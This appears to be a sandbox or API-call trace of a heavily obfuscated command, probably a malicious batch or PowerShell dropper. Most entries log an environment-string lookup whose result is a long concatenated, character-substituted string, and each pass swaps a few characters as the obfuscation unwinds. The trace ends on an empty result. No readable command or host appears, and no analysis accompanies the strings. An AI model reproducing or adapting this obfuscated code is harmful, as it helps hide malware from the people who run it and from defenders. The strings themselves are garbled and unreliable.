Get Environment String name = }],$, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4WxuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4WxH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4WxH6xd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
Get Environment String name = \[, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y4WxuQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn4WxH).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd4WxHaxd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = `]$, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H2iy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = `-$, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3p6aRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3p6PjQIwL7yjUaXmuQIanjU.IqF3p6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3p6N7y8 s3Td]7y).F3p6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3p6NZqF3p6N%wL]a7yjUa%IgYgY-qF3p6NX3pPjgY-4ZqF3p6NgY%zwLhI3737engY-e7e,v%IPjqF3p6Nk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3p6N37gYgYgYgYgY^^^^^^^&1gY@eqF3p6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = [$@+, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3p6aRIA3QI93pe8 e:XbGC7y).7yaTdvwL.InF3p6PjQIwL7yjUaXmuQIanjU.IqF3p6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3p6N7y8 s3Td]7y).F3p6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3p6NZqF3p6N%wL]a7yjUa%IgYgY-qF3p6NX3pPjgY-4ZqF3p6NgY%zwLhI3737engY-e7e,v%IPjqF3p6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQIAqF3p6N37gYgYgYgYgY^^^^^^^&1gY@eqF3p6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = @-, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zwLhwLTdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zwLh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.awLe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_:H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7yla7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7yla7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYFl6aRIA3QI9le8 e:XbGC7y).7yaTdvwL.InFl6PjQIwL7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywLlTdgYgY-nXqFl6NZqFl6N%wL]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zwLhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = ~`*?, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zwLhwLTdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zwLh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.awLe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7yla7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7yla7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYFl6aRIA3QI9le8 e*XbGC7y).7yaTdvwL.InFl6PjQIwL7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywLlTdgYgY-nXqFl6NZqFl6N%wL]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zwLhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = #;, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8 8 zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aEgY-3QI9an37gYjUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn 6)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^&gYse%gYgYajUI/`aKE,%zEhPjgY1gZgYFl6aRIA3QI9le8 e*XbGC7y).7yaTdvE.InFl6PjQIE7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4ERsheZ7yElTdgYgY-nXqFl6NZqFl6N%E]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zEhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzEhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7EgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = *{[, result_out = 